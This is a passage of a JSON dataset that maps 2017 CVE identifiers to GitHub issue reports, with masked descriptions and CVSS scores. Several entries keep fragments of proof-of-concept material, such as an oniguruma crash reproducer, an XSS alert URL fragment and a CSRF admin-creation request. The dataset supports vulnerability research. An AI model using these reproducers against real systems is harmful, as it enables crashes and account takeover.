  15140. "description": "integer underflow in unicode_to_utf8 . tnef NUMBERTAG tnef f $file NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG B: unicode_to_utf8 APITAG NUMBERTAG by NUMBERTAG BC NUMBERTAG mapi_attr_read APITAG NUMBERTAG by NUMBERTAG BD8: parse_file APITAG NUMBERTAG by NUMBERTAG main APITAG unsigned char unicode_to_utf8 (size_t len, unsigned char buf) { int i NUMBERTAG int j NUMBERTAG unsigned char utf8 = malloc NUMBERTAG len NUMBERTAG won't get any longer than this / for (i NUMBERTAG i < len NUMBERTAG i NUMBERTAG when len is NUMBERTAG len NUMBERTAG underflow FILETAG",
  15141. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15142. "severity": "CRITICAL",
  15143. "baseScore": 9.8,
  15144. "impactScore": 5.9,
  15145. "exploitabilityScore": 3.9
  15146. },
  15147. {
  15148. "CVE_ID": "CVE-2017-8929",
  15149. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/658",
  15150. "Issue_Url_new": "https://github.com/virustotal/yara/issues/658",
  15151. "Repo_new": "virustotal/yara",
  15152. "Issue_Created_At": "2017-05-12T06:39:04Z",
  15153. "description": "Use after free in APITAG Use after free in APITAG Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
  15154. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  15155. "severity": "HIGH",
  15156. "baseScore": 7.5,
  15157. "impactScore": 3.6,
  15158. "exploitabilityScore": 3.9
  15159. },
  15160. {
  15161. "CVE_ID": "CVE-2017-8930",
  15162. "Issue_Url_old": "https://github.com/simpleinvoices/simpleinvoices/issues/270",
  15163. "Issue_Url_new": "https://github.com/simpleinvoices/simpleinvoices/issues/270",
  15164. "Repo_new": "simpleinvoices/simpleinvoices",
  15165. "Issue_Created_At": "2017-03-20T18:00:53Z",
  15166. "description": "CSRF in APITAG allows an attacker to take over the website. Hi everyone, I am copying here a message I sent to Richard Rowley a month ago to disclose a couple of CSRF in APITAG I assumed he was one of the developers of this project, but it looks like I was wrong. I didn't hear anything from him so I decided to open an issue here. ===== I found multiple CSRF vulnerabilities in APITAG APITAG The version of Simple Invoices that I used was taken from Bitnami. Unfortunately, it looks like they have taken it out from their library. None of the security relevant state changing operations are protected by an anti CSRF token. For example, consider the POST request to create a new administrator: POST APITAG ... [headers w/ cookies] APITAG An attacker can create an admin user with a CSRF and take over the entire website. The other operations that I have tested are (but I wouldn't exclude the presence of others): Enable/disable Paypal: APITAG Creation of new customers: APITAG Change tax rate: APITAG",
  15167. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15168. "severity": "HIGH",
  15169. "baseScore": 8.8,
  15170. "impactScore": 5.9,
  15171. "exploitabilityScore": 2.8
  15172. },
  15173. {
  15174. "CVE_ID": "CVE-2017-8932",
  15175. "Issue_Url_old": "https://github.com/golang/go/issues/20040",
  15176. "Issue_Url_new": "https://github.com/golang/go/issues/20040",
  15177. "Repo_new": "golang/go",
  15178. "Issue_Created_At": "2017-04-19T17:00:24Z",
  15179. "description": "crypto/elliptic: carry bug in NUMBERTAG P NUMBERTAG Cloudflare reported a carry bug in the P NUMBERTAG implementation that they submitted for NUMBERTAG in NUMBERTAG bacfc NUMBERTAG fba4. I can reproduce this via random testing against APITAG and, after applying the patch that they provided, can no longer do so, even after NUMBERTAG APITAG NUMBERTAG APITAG iterations. This issue is not obviously exploitable, although we cannot rule out the possibility of someone managing to squeeze something through this hole. (It would be a cool paper.) Thus this should be treated as something to fix, but not something on fire, based on what we currently know. Fix will be coming in just a second.",
  15180. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  15181. "severity": "MEDIUM",
  15182. "baseScore": 5.9,
  15183. "impactScore": 3.6,
  15184. "exploitabilityScore": 2.2
  15185. },
  15186. {
  15187. "CVE_ID": "CVE-2017-9072",
  15188. "Issue_Url_old": "https://github.com/victorwon/calendarxp/issues/2",
  15189. "Issue_Url_new": "https://github.com/victorwon/calendarxp/issues/2",
  15190. "Repo_new": "victorwon/calendarxp",
  15191. "Issue_Created_At": "2017-04-24T16:52:39Z",
  15192. "description": "a placeholder for a security issue.",
  15193. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15194. "severity": "MEDIUM",
  15195. "baseScore": 6.1,
  15196. "impactScore": 2.7,
  15197. "exploitabilityScore": 2.8
  15198. },
  15199. {
  15200. "CVE_ID": "CVE-2017-9090",
  15201. "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/25",
  15202. "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/25",
  15203. "Repo_new": "s3131212/allendisk",
  15204. "Issue_Created_At": "2017-05-10T08:06:38Z",
  15205. "description": "Captcha Bypass Vulnerability in FILETAG . /reg.php CODETAG As with FILETAG , the following code does not check wether isset($_SESSION FILETAG",
  15206. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  15207. "severity": "HIGH",
  15208. "baseScore": 7.5,
  15209. "impactScore": 3.6,
  15210. "exploitabilityScore": 3.9
  15211. },
  15212. {
  15213. "CVE_ID": "CVE-2017-9091",
  15214. "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/23",
  15215. "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/23",
  15216. "Repo_new": "s3131212/allendisk",
  15217. "Issue_Created_At": "2017-05-10T03:04:29Z",
  15218. "description": "Captcha Bypass Vulnerability in FILETAG . /admin/loginc.php CODETAG Note that $_SESSION FILETAG How to fix: CODETAG",
  15219. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  15220. "severity": "HIGH",
  15221. "baseScore": 7.5,
  15222. "impactScore": 3.6,
  15223. "exploitabilityScore": 3.9
  15224. },
  15225. {
  15226. "CVE_ID": "CVE-2017-9093",
  15227. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/26",
  15228. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/26",
  15229. "Repo_new": "jsummers/imageworsener",
  15230. "Issue_Created_At": "2017-05-13T18:36:03Z",
  15231. "description": "logical bug in src/imagew jpeg.c: my_skip_input_data_fn that leads to infinite loop. Done via fuzzed JPEG FILETAG 'my_skip_input_data_fn tries to skip NUMBERTAG bytes which is bigger than the file size thus leading to infinite loop trying to reread from the buffer I believe if reading failed there isn't too much that can be done to save the situation this is my suggested edit CODETAG",
  15232. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15233. "severity": "MEDIUM",
  15234. "baseScore": 6.5,
  15235. "impactScore": 3.6,
  15236. "exploitabilityScore": 2.8
  15237. },
  15238. {
  15239. "CVE_ID": "CVE-2017-9094",
  15240. "Issue_Url_old": "https://github.com/jsummers/imageworsener/issues/27",
  15241. "Issue_Url_new": "https://github.com/jsummers/imageworsener/issues/27",
  15242. "Repo_new": "jsummers/imageworsener",
  15243. "Issue_Created_At": "2017-05-16T18:13:13Z",
  15244. "description": "Another infinite loop. Unfortunately i will not be able to provide help because the problem is within internals of GIF images first I would like to say that this image is fuzzed JPEG. FILETAG however this is a backtrace for where the hanging occured CODETAG the problem isn't how is it parsed but it is that it lead to infinite loop somehow",
  15245. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15246. "severity": "MEDIUM",
  15247. "baseScore": 6.5,
  15248. "impactScore": 3.6,
  15249. "exploitabilityScore": 2.8
  15250. },
  15251. {
  15252. "CVE_ID": "CVE-2017-9110",
  15253. "Issue_Url_old": "https://github.com/openexr/openexr/issues/232",
  15254. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/232",
  15255. "Repo_new": "academysoftwarefoundation/openexr",
  15256. "Issue_Created_At": "2017-05-23T08:00:18Z",
  15257. "description": "Multiple segmentation faults CVETAG to CVETAG . Brandon Perry provided multiple images that can crash APITAG URLTAG The files he sent are here (along with the output of valgrind apparently) FILETAG Mitre assigned the following CVE to those issues: CVETAG CVETAG CVETAG CVETAG CVETAG CVETAG CVETAG",
  15258. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15259. "severity": "MEDIUM",
  15260. "baseScore": 6.5,
  15261. "impactScore": 3.6,
  15262. "exploitabilityScore": 2.8
  15263. },
  15264. {
  15265. "CVE_ID": "CVE-2017-9141",
  15266. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/489",
  15267. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/489",
  15268. "Repo_new": "imagemagick/imagemagick",
  15269. "Issue_Created_At": "2017-05-15T18:11:32Z",
  15270. "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in profile.c. APITAG testcase : URLTAG Credit : APITAG of Venustech",
  15271. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15272. "severity": "MEDIUM",
  15273. "baseScore": 6.5,
  15274. "impactScore": 3.6,
  15275. "exploitabilityScore": 2.8
  15276. },
  15277. {
  15278. "CVE_ID": "CVE-2017-9142",
  15279. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/490",
  15280. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/490",
  15281. "Repo_new": "imagemagick/imagemagick",
  15282. "Issue_Created_At": "2017-05-15T18:12:54Z",
  15283. "description": "assertion failed in APITAG on Version: APITAG NUMBERTAG Q NUMBERTAG A crafted file revealed an assertion failure in blob.c. APITAG testcase : URLTAG Credit : APITAG of Venustech",
  15284. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15285. "severity": "MEDIUM",
  15286. "baseScore": 6.5,
  15287. "impactScore": 3.6,
  15288. "exploitabilityScore": 2.8
  15289. },
  15290. {
  15291. "CVE_ID": "CVE-2017-9143",
  15292. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/456",
  15293. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/456",
  15294. "Repo_new": "imagemagick/imagemagick",
  15295. "Issue_Created_At": "2017-04-28T03:59:26Z",
  15296. "description": "memory leak in APITAG . on APITAG NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. convert $FILE FILETAG APITAG Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f5ffe NUMBERTAG in __interceptor_posix_memalign PATHTAG NUMBERTAG bef5 in APITAG APITAG NUMBERTAG bf9d in APITAG APITAG NUMBERTAG ac in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG Indirect leak of NUMBERTAG byte(s) in NUMBERTAG 
object(s) allocated from NUMBERTAG f5ffe NUMBERTAG b NUMBERTAG in __interceptor_malloc PATHTAG NUMBERTAG ecdb in APITAG APITAG NUMBERTAG ed2f in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG in APITAG APITAG NUMBERTAG c8d2 in APITAG APITAG NUMBERTAG f NUMBERTAG a7 in APITAG APITAG NUMBERTAG f NUMBERTAG f5 in APITAG APITAG NUMBERTAG adc3e5 in APITAG APITAG NUMBERTAG c NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG in APITAG APITAG NUMBERTAG fa NUMBERTAG in main APITAG NUMBERTAG f5ff NUMBERTAG b NUMBERTAG in __libc_start_main APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). testcase: FILETAG APITAG of Venustech",
  15297. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15298. "severity": "MEDIUM",
  15299. "baseScore": 6.5,
  15300. "impactScore": 3.6,
  15301. "exploitabilityScore": 2.8
  15302. },
  15303. {
  15304. "CVE_ID": "CVE-2017-9146",
  15305. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/47",
  15306. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/47",
  15307. "Repo_new": "yeraze/ytnef",
  15308. "Issue_Created_At": "2017-05-15T07:45:56Z",
  15309. "description": "heap buffer overrun: write extra bytes in APITAG We discover a buffer over write problem in the APITAG functiion. The cause is: The checker APITAG is not valid as the pointer d is incremented during exectuion. So the correct checking should use calculated value APITAG instead of NUMBERTAG We propose a initial patch to solve it. CODETAG ERRORTAG The testcase can be downloaded here FILETAG",
  15310. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  15311. "severity": "HIGH",
  15312. "baseScore": 8.8,
  15313. "impactScore": 5.9,
  15314. "exploitabilityScore": 2.8
  15315. },
  15316. {
  15317. "CVE_ID": "CVE-2017-9224",
  15318. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/57",
  15319. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/57",
  15320. "Repo_new": "kkos/oniguruma",
  15321. "Issue_Created_At": "2017-05-22T07:36:55Z",
  15322. "description": "Buffer Overflow in APITAG The buffer overflow is found with the code: ERRORTAG The asan err can be found as follows: ERRORTAG",
  15323. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15324. "severity": "CRITICAL",
  15325. "baseScore": 9.8,
  15326. "impactScore": 5.9,
  15327. "exploitabilityScore": 3.9
  15328. },
  15329. {
  15330. "CVE_ID": "CVE-2017-9225",
  15331. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/56",
  15332. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/56",
  15333. "Repo_new": "kkos/oniguruma",
  15334. "Issue_Created_At": "2017-05-22T07:01:01Z",
  15335. "description": "Buffer Overflow in APITAG This buffer overflow is found in the latest develop branch with the code: include APITAG int APITAG { regex_t reg; const APITAG inp = (const APITAG ) PATHTAG if (onig_new (&reg, inp, inp NUMBERTAG ONIG_OPTION_IGNORECASE , ONIG_ENCODING_UTF NUMBERTAG BE, ONIG_SYNTAX_DEFAULT NUMBERTAG onig_free(reg); return NUMBERTAG Error reported in asan: APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffc NUMBERTAG ea4 at pc NUMBERTAG f9 bp NUMBERTAG ffc NUMBERTAG aa0 sp NUMBERTAG ffc NUMBERTAG a NUMBERTAG WRITE of size NUMBERTAG at NUMBERTAG ffc NUMBERTAG ea4 thread T NUMBERTAG f8 in APITAG PATHTAG NUMBERTAG b in APITAG PATHTAG NUMBERTAG c5 in expand_case_fold_string PATHTAG NUMBERTAG in setup_tree PATHTAG NUMBERTAG c NUMBERTAG f in onig_compile PATHTAG NUMBERTAG d NUMBERTAG in onig_new PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG f4ca3cc NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG ec8 in _start ( PATHTAG ) Address NUMBERTAG ffc NUMBERTAG ea4 is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG b in expand_case_fold_string PATHTAG This frame has NUMBERTAG object(s NUMBERTAG prev_node NUMBERTAG srem NUMBERTAG items' APITAG NUMBERTAG acc NUMBERTAG d NUMBERTAG f4 f4 f4 f3 f3 f3 f NUMBERTAG acc NUMBERTAG e NUMBERTAG acc NUMBERTAG f NUMBERTAG f1 f1 f1 f NUMBERTAG f4 f4 f4 f3 f NUMBERTAG acc NUMBERTAG f3 f NUMBERTAG f1 f NUMBERTAG acc NUMBERTAG f1 f NUMBERTAG f4 f4 f4 f2 f2 f2 f NUMBERTAG f4 f4 f2 f NUMBERTAG acc NUMBERTAG f2 f NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra 
object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  15336. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15337. "severity": "CRITICAL",
  15338. "baseScore": 9.8,
  15339. "impactScore": 5.9,
  15340. "exploitabilityScore": 3.9
  15341. },
  15342. {
  15343. "CVE_ID": "CVE-2017-9226",
  15344. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/55",
  15345. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/55",
  15346. "Repo_new": "kkos/oniguruma",
  15347. "Issue_Created_At": "2017-05-18T04:28:31Z",
  15348. "description": "Heap corruption in APITAG in NUMBERTAG encodings. This heap corruption is due to a different cause than issue NUMBERTAG and NUMBERTAG the following is found after applying the patches of both. The issue affects latest PHP NUMBERTAG installations with mbstring enabled, when the regular expression is from network, this can be considered as a security issue. Tested on NUMBERTAG bit ASAN build, one of the NUMBERTAG encodings below would cause an out of bound write: $ cat FILETAG ERRORTAG $ bin/php FILETAG ERRORTAG",
  15349. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15350. "severity": "CRITICAL",
  15351. "baseScore": 9.8,
  15352. "impactScore": 5.9,
  15353. "exploitabilityScore": 3.9
  15354. },
  15355. {
  15356. "CVE_ID": "CVE-2017-9227",
  15357. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/58",
  15358. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/58",
  15359. "Repo_new": "kkos/oniguruma",
  15360. "Issue_Created_At": "2017-05-22T15:23:45Z",
  15361. "description": "Bug in mbc_enc_len. The buffer overflow is found with the following code: ERRORTAG asan error can be found: ERRORTAG",
  15362. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15363. "severity": "CRITICAL",
  15364. "baseScore": 9.8,
  15365. "impactScore": 5.9,
  15366. "exploitabilityScore": 3.9
  15367. },
  15368. {
  15369. "CVE_ID": "CVE-2017-9228",
  15370. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/60",
  15371. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/60",
  15372. "Repo_new": "kkos/oniguruma",
  15373. "Issue_Created_At": "2017-05-23T16:04:18Z",
  15374. "description": "Heap corruption in APITAG due to uninitialized local variable. The following non deterministic behavior can be triggered from the following code. With ASAN enabled, on NUMBERTAG bit platform, the crash reproduces within NUMBERTAG runs. ERRORTAG With some add on: ERRORTAG ERRORTAG ASAN report: ERRORTAG The probabilistic reproducer triggers a heap OOB write when the local variable APITAG vs in APITAG is not initialized, following the call as: APITAG > APITAG > APITAG resulting in the said crash. Note the calls to APITAG is currently necessary to trigger the crash.",
  15375. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  15376. "severity": "CRITICAL",
  15377. "baseScore": 9.8,
  15378. "impactScore": 5.9,
  15379. "exploitabilityScore": 3.9
  15380. },
  15381. {
  15382. "CVE_ID": "CVE-2017-9229",
  15383. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/59",
  15384. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/59",
  15385. "Repo_new": "kkos/oniguruma",
  15386. "Issue_Created_At": "2017-05-23T13:28:54Z",
  15387. "description": "SIGSEGV in APITAG due to bad dereference. Test code: ERRORTAG ASAN output: ERRORTAG In APITAG CODETAG Later reg >dmax is used in pointer arithmetic at forward_search_range, resulting in a bad reference from APITAG CODETAG Bad dereference: ERRORTAG",
  15388. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  15389. "severity": "HIGH",
  15390. "baseScore": 7.5,
  15391. "impactScore": 3.6,
  15392. "exploitabilityScore": 3.9
  15393. },
  15394. {
  15395. "CVE_ID": "CVE-2017-9249",
  15396. "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/21",
  15397. "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/21",
  15398. "Repo_new": "s3131212/allendisk",
  15399. "Issue_Created_At": "2017-05-09T09:28:07Z",
  15400. "description": "XSS Vulnerability in FILETAG . How to reproduce NUMBERTAG Upload FILETAG to your disk. FILETAG APITAG NUMBERTAG Make FILETAG public NUMBERTAG Get the link to FILETAG , eg. URLTAG NUMBERTAG SS would be triggered once user visit the link above. APITAG FILETAG",
  15401. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  15402. "severity": "MEDIUM",
  15403. "baseScore": 5.4,
  15404. "impactScore": 2.7,
  15405. "exploitabilityScore": 2.3
  15406. },
  15407. {
  15408. "CVE_ID": "CVE-2017-9250",
  15409. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/1821",
  15410. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/1821",
  15411. "Repo_new": "jerryscript-project/jerryscript",
  15412. "Issue_Created_At": "2017-05-13T02:26:02Z",
  15413. "description": "Denial of Service: Null Pointer De reference. I've discovered a NULL pointer de reference condition within Jerryscript. If the bytes NUMBERTAG c NUMBERTAG e NUMBERTAG a NUMBERTAG are evaluated by jerry_eval a segmentation fault will occur resulting in a denial of service. It occurs within jmem_heap_free_block when block_p >size is de referenced. Proof FILETAG The call tree is as follows (generally NUMBERTAG jerry_eval NUMBERTAG ecma_op_eval_chars_buffer NUMBERTAG parser_parse_script NUMBERTAG parser_parse_source NUMBERTAG lexer_next_token (parses the source for strings and returns NUMBERTAG parser_parse_statements (throws a parsing error via parser_raise_error and returns to the parser_parse_source PARSER_CATCH statement NUMBERTAG parser_free_literals NUMBERTAG util_free_literal NUMBERTAG jmem_heap_free_block (SEGMENTATION FAULT)",
  15414. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  15415. "severity": "HIGH",
  15416. "baseScore": 7.5,
  15417. "impactScore": 3.6,
  15418. "exploitabilityScore": 3.9
  15419. },
  15420. {
  15421. "CVE_ID": "CVE-2017-9261",
  15422. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/476",
  15423. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/476",
  15424. "Repo_new": "imagemagick/imagemagick",
  15425. "Issue_Created_At": "2017-05-06T07:37:11Z",
  15426. "description": "memory leak in APITAG on APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: FILETAG Credit : APITAG of Venustech",
  15427. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15428. "severity": "MEDIUM",
  15429. "baseScore": 6.5,
  15430. "impactScore": 3.6,
  15431. "exploitabilityScore": 2.8
  15432. },
  15433. {
  15434. "CVE_ID": "CVE-2017-9262",
  15435. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/475",
  15436. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/475",
  15437. "Repo_new": "imagemagick/imagemagick",
  15438. "Issue_Created_At": "2017-05-06T07:35:38Z",
  15439. "description": "memory leak in APITAG on APITAG NUMBERTAG Q NUMBERTAG The APITAG function in APITAG allows attackers to cause a denial of service (memory leak) via a crafted file. CODETAG testcase: FILETAG Credit: APITAG of Venustech",
  15440. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  15441. "severity": "MEDIUM",
  15442. "baseScore": 6.5,
  15443. "impactScore": 3.6,
  15444. "exploitabilityScore": 2.8
  15445. },
  15446. {
  15447. "CVE_ID": "CVE-2017-9288",
  15448. "Issue_Url_old": "https://github.com/MindscapeHQ/raygun4wordpress/issues/16",
  15449. "Issue_Url_new": "https://github.com/mindscapehq/raygun4wordpress/issues/16",
  15450. "Repo_new": "mindscapehq/raygun4wordpress",
  15451. "Issue_Created_At": "2017-02-07T09:28:22Z",
  15452. "description": "A Reflected XSS Vulnerability in wordpress plugin APITAG NUMBERTAG Hello\uff1a I found a Reflected XSS Vulnerability in wordpress plugin APITAG NUMBERTAG which is developmented by your company, this plugin can be downloaded at wordpress plugin website \" URLTAG \". How can i send this vulnerability report to you to fix it. My Email is EMAILTAG .",
  15453. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15454. "severity": "MEDIUM",
  15455. "baseScore": 6.1,
  15456. "impactScore": 2.7,
  15457. "exploitabilityScore": 2.8
  15458. },
  15459. {
  15460. "CVE_ID": "CVE-2017-9289",
  15461. "Issue_Url_old": "https://github.com/bramkorsten/Note/issues/11",
  15462. "Issue_Url_new": "https://github.com/bramkorsten/note/issues/11",
  15463. "Repo_new": "bramkorsten/note",
  15464. "Issue_Created_At": "2017-03-04T15:07:07Z",
  15465. "description": "I have find a Reflected XSS vulnerability in this project. Hello: I have find a Reflected XSS vulnerability in this project. The vulnerability exists due to insufficient filtration of user supplied data in \"edit\" HTTP parameter that will be passed to PATHTAG The infected source code is line NUMBERTAG there is no protection on $_GET FILETAG So if a attacker construct a special url as follow and send it to a victim, when the victim click the url, the code which is contained in the url will be executed on the victim's browser side to do some evil. URLTAG \"> APITAG alert NUMBERTAG APITAG <\" The follow scrrenshot is the result to click the upper url ( win7 spq NUMBERTAG firefo NUMBERTAG bit ): FILETAG Discoverer: Haojun Hou, APITAG in APITAG of Venustech",
  15466. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  15467. "severity": "MEDIUM",
  15468. "baseScore": 6.1,
  15469. "impactScore": 2.7,
  15470. "exploitabilityScore": 2.8
  15471. },
  15472. {
  15473. "CVE_ID": "CVE-2017-9304",
  15474. "Issue_Url_old": "https://github.com/VirusTotal/yara/issues/674",
  15475. "Issue_Url_new": "https://github.com/virustotal/yara/issues/674",
  15476. "Repo_new": "virustotal/yara",
  15477. "Issue_Created_At": "2017-05-29T05:56:00Z",
  15478. "description": "Stack overflow in APITAG Stack overflow in APITAG Tested on Git HEAD: APITAG FILETAG To reproduce: APITAG ASAN: ERRORTAG",
  15479. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  15480. "severity": "HIGH",
  15481. "baseScore": 7.5,
  15482. "impactScore": 3.6,
  15483. "exploitabilityScore": 3.9
  15484. },
  15485. {
  15486. "CVE_ID": "CVE-2017-9307",
  15487. "Issue_Url_old": "https://github.com/s3131212/allendisk/issues/20",
  15488. "Issue_Url_new": "https://github.com/s3131212/allendisk/issues/20",
  15489. "Repo_new": "s3131212/allendisk",
  15490. "Issue_Created_At": "2017-05-09T08:58:30Z",
  15491. "description": "SSRF Vulnerability in FILETAG . /remotedownload.php CODETAG Obviously, $_POST['file'] could be within intranet ip range, eg. FILETAG , thus exposing a great attack surface.",
  15492. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  15493. "severity": "MEDIUM",
  15494. "baseScore": 6.5,
  15495. "impactScore": 3.6,
  15496. "exploitabilityScore": 2.8
  15497. },
  15498. {
  15499. "CVE_ID": "CVE-2017-9331",
  15500. "Issue_Url_old": "https://github.com/Telaxus/EPESI/issues/193",
  15501. "Issue_Url_new": "https://github.com/telaxus/epesi/issues/193",
  15502. "Repo_new": "Telaxus/EPESI",
  15503. "Issue_Created_At": "2017-05-27T09:44:21Z",
